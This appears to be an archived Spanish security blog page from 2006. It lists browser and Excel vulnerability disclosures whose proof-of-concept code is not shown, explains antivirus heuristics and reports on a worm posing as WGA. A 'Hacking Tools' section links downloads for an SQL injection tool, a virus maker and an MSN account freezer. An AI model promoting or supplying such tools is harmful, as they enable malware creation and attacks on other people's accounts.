El bug siguiente fue probado sobre la última versión de Internet Explorer 6 sobre un Windows 2000 totalmente remendado SP4. Parece haber sido resuelto (vía killbit) en una modernización reciente a Windows XP SP2. Este defecto es uno de muchos que son provocados por el cargado de un objeto Non-ActiveX COM dentro de Internet Explorer.

a = new ActiveXControl('OutlookExpress.AddressBook');

Prueba de Concepto

Internet.HHCtrl Image Property denial of Service....

El bug siguiente fue probado sobre la última versión de Internet Explorer 6 totalmente remendado sobre XP SP2. Este bug es interesante porque un pequeño heap overflow ocurre cada vez que esta característica es ejecutada. El defecto es difícil de descubrir a no ser que hayan permitido la verificación de heap en las propiedades de ajuste globales para iexplore.exe.

Prueba de Concepto

Creditos: hdm

MS IE ADODB.Recordset Filter Property Denial of Service...

Microsoft Internet Explorer es propenso a una condicion de denegacion de servicio cuando procesa el objeto'ADODB.Recordset Filter Property'.

Un ataque exitoso puede hacer que el navegador falle debido a un null-pointer dereference.

Prueba de Concepto

Creditos: hdm

Excel 2000/XP/2003 Style 0-day

Detalles:
Una vulnerabilidad ha sido descubierta en Microsoft Excel, que puede ser explotado por un atacante para comprometer el sistema de un usuario.

Excel 2003 & XP
EIP-> 00xx00xx
Click Repair Mode .......Exploit....:P

Excel 2000
Click Style
EIP-> xxxxxxxx

Prueba de Concepto

Paper: Como Funciona la heurística antivirus??? (Primera Parte)

La heurística muchas veces es vista como magia, como esa capacidad que tiene una solución antivirus para clasificar como maliciosa una muestra sin tener consignada una firma específica para la misma. Una técnica “mágica” que permite marcar al software como sospechoso de tener un comportamiento potencialmente malicioso.

Nada mas lejos de la realidad. El principio de la heurística es muy sencillo y fácil de comprender. Otro tema bien distinto es que los algoritmos resultantes sean mejores o peores, que es donde está realmente el quid de la cuestión.

Wikipedia: Se denomina heurística a la capacidad de un sistema para realizar de forma inmediata innovaciones positivas para sus fines.

Heurística en computación
Si tenemos el motor antivirus corriendo y detecta un comportamiento sospechoso, éste pasará a un estado de alerta y nos notificará que la muestra es potencialmente peligrosa. El antivirus no va a estar totalmente seguro del carácter malicioso, puesto que lo ha marcado como sospechoso en función a indicios de comportamiento, y no en función a una firma conocida y con la que existe un 100% de coincidencia. El sistema realiza innovaciones positivas para su finalidad (nuestra salvaguarda) en tiempo real, o al menos, de modo inmediato.

Este análisis de comportamiento sencillito que hemos visto da origen a toda una rama de las ciencias exactas. Las matemáticas heurísticas son complejas, ya que a fin de cuentas tratan de modelizar comportamientos y no realidades claras y directas. La gran mayoría de las veces, los resultados de este tipo de aproximaciones no podrán ser explicadas.

Estas técnicas de reconocimiento inteligente son lo que matemáticamente se conoce como algoritmos exploratorios multivariantes. Veamos qué es cada cosa en esa frase.

* Algoritmo: Modelización matemática de un comportamiento finito, es decir, que tiene un comienzo y un final.
* Exploratorio: Método de observación y análisis que permite, posteriormente, la toma de decisiones.
* Multivariante: Carácter matemático que establece la dependencia de un evento determinado de múltiples factores concurrentes.

En resumen, si la detección heurística de virus es un problema matemático de exploración multivariante que necesita ser modelizado, a través de distintos algoritmos.

Segun Wikipedia:

Firmas Genéricas

Muchos códigos maliciosos son modificados en forma constante por sus autores para crear nuevas versiones. Usualmente, estas variantes contienen similitudes con los originales, lo cual se denomina como una familia de virus. Gracias a las similitudes dentro del código del virus, los antivirus pueden llegar a reconocer a todos los miembros de la misma familia a través de una única firma o vacuna genérica. Esto permite que al momento de aparecer una nueva versión de un virus ya conocido, aquellos antivirus que implementan esta técnica puedan detectarlo sin la necesidad de una actualización.

Reconocimiento de código compilado

Cuando un programa es compilado para poder convertirlo en un archivo ejecutable, la codificación resultante representa instrucciones que se le darán al sistema para realizar ciertas acciones. Las implementaciones de heurística de algunos antivirus utilizan técnicas para reconocer instrucciones comúnmente aplicadas por los códigos maliciosos, y así poder identificar si un archivo ejecutable puede llegar a ser un código malicioso.

Desensamblado

Todo archivo ejecutable puede ser desensamblado con el objetivo de obtener el código fuente del programa en lenguaje ensamblador. La heurística de algunos productos antivirus es capaz de analizar el código fuente de los programas sospechosos con el fin de reconocer en él técnicas de desarrollo que normalmente sean usadas por los programadores de virus y así reconocer un código malicioso nuevo sin la necesidad de una actualización.

Desempaquetamiento

Los programadores de códigos maliciosos suelen usar empaquetadores de archivos con el fin de modificar la “apariencia” del virus a los ojos del análisis antivirus. Empaquetadores como UPX, son ampliamente utilizados para esto. Para evitar ser engañados por un código malicioso antiguo, reempaquetado, los antivirus incluyen en sus técnicas heurísticas métodos de desempaquetamiento con el fin de poder analizar el código real del programa, y no el empaquetado.

La mejor heurística, la más óptima

Por definición, un algoritmo heurístico es aquel que, sin poder obtener certeza de un evento, se pretende aproximar lo máximo a la realidad. Parece por tanto adecuado deducir que el mejor algoritmo heurístico será aquel que, para una actividad determinada, se aproxime más al comportamiento real de los sucesos sometidos a exploración. Los factores de mejora básicos de la optimización son los siguientes:

* Inversión mínima de recursos computacionales
* Minimización de falsos positivos y fallidos verdaderos
* Extensibilidad del modelo a escenarios de alta variabilidad

Evaluaciones Retrospectivas

La Heurística es un aspecto muy díficil de probar en los productos antivirus, dado que se requiere realizar las denominadas evaluaciones retrospectivas. Para poder analizar correctamente el funcionamiento de las capacidades heurísticas o proactivas de un antivirus, lo que se hace es detener la actualización de firmas del producto durante un período de tiempo X. En ese lapso, se acumulan muestras de códigos maliciosos nuevos, para que una vez recolectada una cantidad suficiente, se analice si los productos antivirus las reconocen o no. Al no haber sido actualizados para detectar esas muestras, el antivirus solo podrá reconocer si están infectadas o no a través de sus capacidades heurísticas.

Gracias a estas evaluaciones se puede conocer en detalle el rendimiento de los productos antivirus frente a virus nuevos o desconocidos.

Origen

domingo, julio 02, 2006

Hacking Tools...

SQL Power Injector
Image Hosting by PicsPlace.to

Download
Tutorial
--------------------------------------------------------------------------------------------

Radmin v2.2 (final)
Image Hosting by PicsPlace.to

Download
--------------------------------------------------------------------------------------------

JPS Virus Maker
Herramienta para la confeccion de virus...
Image Hosting by PicsPlace.to

Download o Download
---------------------------------------------------------------------------------------------

-50° Celsius MSN Account Freezer
Image Hosting by PicsPlace.to

Download o Download

sábado, julio 01, 2006

OPERA Web Browser 9 (iframe)Denial OF Service

Author : Ahmad Muammar W.K (a.k.a) y3dips
Aplicacion: Opera Web Browser
Version : Opera/9.00 (X11; Linux i686; U; en) Opera/9.00 (Windows NT 5:1;U;en)

Detalles
La vulnerabilidad puede ser explotada usando iframe combinado con javascript (documentos stylesheet) para crear un acceso de memoria fuera de límites.

Prueba de Concepto

WindizUpdate: actualizar Windows sin usar Explorer

Es probable que algunos usuarios de Windows sólo utilicen Explorer para bajarse parches o actualizaciones de Microsoft. Pues bien; WindizUpdate asegura que permite actualizar Windows desde Opera, Firefox y otros navegadores, aportando además -presuntamente- ciertas ventajas adicionales.
Si alguien desea probar este plug-in, y comentar sus resultados...

Mas info

Un gusano se disfraza de WGA...

Cuebot-K es un nuevo gusano para Windows que se camufla en un fichero denominado "wgavn.exe", simulando ser software relacionado con WGA, la polémica utilidad antipiratería de Microsoft.

Cuando logra instalarse en un sistema se registra como si fuera un driver denominado wgavn y se muestra en la lista de procesos en ejecución como "Windows Genuine Advantage Validation Notification".

Según PC World, Cuebot-K es capaz de apagar cortafuegos, examinar ficheros locales, provocar ataque DoS distribuidos y descargar otros programas maliciosos.



Via:Kriptopolis

WGA apagara pcs en septiembre???...

La aplicación Windows Genuine Advantage, que se encarga de verificar la autenticidad de nuestra copia de Windows, podría causar que el PC se apagase si se detecta software ilegal. El rumor está ahí, y Microsoft no lo desmiente.

ZDNet pidió a los chicos de Redmond que confirmaran o negaran estos rumores, pero no recibieron respuesta alguna. Actualmente este sistema de protección se encarga de molestar a los usuarios con ventanas emergentes.

De acuerdo con un usuario que contactó con ZDNet, desde la sección de soporte de Windows se le comunicó que aquellos que no utilizasen WGA en otoño tendrían sus ordenadores apagados. Windows daría un aviso con 30 días de antelación, y si no se instalase antes de la fecha indicada, el sistema operativo dejaría de funcionar.

Mas Info

ecoestadistica.com